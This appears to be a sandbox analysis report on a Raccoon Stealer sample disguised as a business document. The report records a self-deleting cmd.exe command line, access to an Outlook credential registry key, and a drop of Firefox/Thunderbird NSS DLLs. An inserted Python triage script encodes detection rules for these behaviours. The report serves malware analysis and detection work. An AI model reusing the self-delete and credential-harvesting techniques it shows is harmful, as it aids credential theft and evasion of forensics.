Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837414207.0000000000A22000.00000004.00000001.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837391480.0000000000A12000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: https://telete.in/org/img/t_logo.png
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: https://telete.in/yoyodcabane
Source: nssckbi.dll.4.dr String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.4.dr String found in binary or memory: https://www.catcert.net/verarrel05
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngx%
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/favicon.ico
Source: RYwTiizs2t.4.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown HTTPS traffic detected: 111.67.28.15:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.4:49743 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798629979.000000000076A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Raccoon Stealer
Source: Yara match File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY

System Summary:

Abnormal high CPU Usage
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process Stats: CPU usage > 98%
PE file contains more sections than normal
Source: sqlite3.dll.4.dr Static PE information: Number of sections : 18 > 10
Sample file is different than original file name gathered from version info
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798617531.0000000000740000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameindsetknopw.exeFE2XBoshiyuki TasuiBoshiyuki Tasui@ vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameindsetknopw.exeFE2XBoshiyuki TasuiK vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameindsetknopw.exeFE2X vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameindsetknopw.exeFE2XBoshiyuki Tasui vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameindsetknopw.exeFE2XBoshiyuki Tasui. vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameindsetknopw.exeFE2XBoshiyuki Tasuiw vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000000.651225218.000000000041C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameindsetknopw.exe vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854463696.000000006D2BB000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll8 vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854151367.000000006D162000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853350592.000000001E180000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000000.797569198.000000000041C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameindsetknopw.exe vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853428201.0000000066C40000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853312694.000000001E010000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853293961.000000001DEC0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853337212.000000001E160000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dllj% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Binary or memory string: OriginalFilenameindsetknopw.exe vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Uses 32bit PE files
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/67@2/3
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Mutant created: \Sessions\1\BaseNamedObjects\uiabfqwfuuser
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_01
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\Local\Temp\~DF4AE595A1013A60B4.TMP
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: softokn3.dll.4.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.4.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.4.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.4.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.4.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.4.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.4.dr Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.4.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.4.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.4.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.4.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.4.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: unknown Process created: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe 'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe'
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process created: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe 'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe'
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
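The three behaviours listed above (a delayed self-delete through cmd.exe/timeout, access to the Outlook "OMI Account Manager" key, and the burst of Mozilla NSS/sqlite DLLs written under %LocalLow%) are what a detection engineer would key on. The script below is an added example, not part of the sandbox report: it runs three triage rules over constructed Sysmon-style process, registry and file events modelled on this report. The event field names (type, image, parent_image, command_line, key, path) are an assumed schema, not the sandbox's export format.

```python
import re
from collections import defaultdict

# One-liner the sample uses to delete itself after a 10 s delay:
#   cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q '<own path>'
SELF_DELETE_RE = re.compile(
    r"cmd(?:\.exe)?\s+/c\s+timeout\b.*?&\s*del\s+(?:/\w\s+)*['\"]?(?P<target>[^'\"]+)",
    re.IGNORECASE,
)

# Mozilla NSS/sqlite libraries a stealer needs to decrypt Firefox/Thunderbird logins
NSS_STEALER_DLLS = {"nss3.dll", "softokn3.dll", "freebl3.dll", "mozglue.dll", "sqlite3.dll"}

# Registry key that holds mail account settings, including stored credentials
MAIL_CRED_KEYS = ("software\\microsoft\\office\\outlook\\omi account manager",)

SAMPLE = "C:\\Users\\user\\Desktop\\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe"
DROP_DIR = "C:\\Users\\user\\AppData\\LocalLow\\gC9tT2iQ3s\\"

# Constructed events modelled on the report; the field names are an assumed Sysmon-like schema.
EVENTS = [
    {"type": "process_create", "image": "C:\\Windows\\SysWOW64\\cmd.exe", "parent_image": SAMPLE,
     "command_line": "cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q '" + SAMPLE + "'"},
    {"type": "process_create", "image": "C:\\Windows\\SysWOW64\\timeout.exe",
     "parent_image": "C:\\Windows\\SysWOW64\\cmd.exe", "command_line": "timeout /T 10 /NOBREAK"},
    {"type": "reg_open", "image": SAMPLE,
     "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager"},
] + [
    {"type": "file_create", "image": SAMPLE, "path": DROP_DIR + name}
    for name in ("nss3.dll", "softokn3.dll", "freebl3.dll", "mozglue.dll", "ucrtbase.dll")
] + [
    {"type": "file_create", "image": SAMPLE, "path": "C:\\Users\\user\\AppData\\LocalLow\\sqlite3.dll"},
    # Benign control: a Thunderbird component writing one NSS DLL into its own install directory
    {"type": "file_create", "image": "C:\\Program Files\\Mozilla Thunderbird\\updater.exe",
     "path": "C:\\Program Files\\Mozilla Thunderbird\\nss3.dll"},
]


def self_delete_targets(events):
    """Return (parent image, deleted path) where a parent spawns a delayed delete of itself."""
    hits = []
    for ev in events:
        if ev["type"] != "process_create":
            continue
        m = SELF_DELETE_RE.search(ev["command_line"])
        if m and m.group("target").strip().lower() == ev["parent_image"].lower():
            hits.append((ev["parent_image"], m.group("target").strip()))
    return hits


def mail_credential_access(events):
    """Return images that opened a registry key holding mail account credentials."""
    return sorted({ev["image"] for ev in events
                   if ev["type"] == "reg_open"
                   and any(k in ev["key"].lower() for k in MAIL_CRED_KEYS)})


def nss_dll_drops(events, threshold=3):
    """Group file creations by writer and flag writers that drop several NSS DLLs."""
    by_writer = defaultdict(set)
    for ev in events:
        if ev["type"] == "file_create":
            name = ev["path"].rsplit("\\", 1)[-1].lower()
            if name in NSS_STEALER_DLLS:
                by_writer[ev["image"]].add(name)
    return {img: sorted(names) for img, names in by_writer.items() if len(names) >= threshold}


def triage(events):
    """Combine the three rules into a list of findings per process image."""
    verdict = defaultdict(list)
    for parent, _ in self_delete_targets(events):
        verdict[parent].append("delayed self-delete")
    for image in mail_credential_access(events):
        verdict[image].append("mail credential key access")
    for image, dlls in nss_dll_drops(events).items():
        # In production, allowlist on the writer's Authenticode signer rather than its path.
        if "mozilla" not in image.lower():
            verdict[image].append("drops NSS stack: " + ", ".join(dlls))
    return dict(verdict)
```

The NSS rule deliberately counts distinct library names per writer instead of matching a single file name: a legitimate Thunderbird or Firefox installer writes the same DLLs, so the signal is a non-Mozilla process assembling the whole decryption stack under a user-writable directory.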
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.4.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.4.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.4.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.4.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.4.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854118774.000000006D159000.00000002.00020000.sdmp, mozglue.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.4.dr
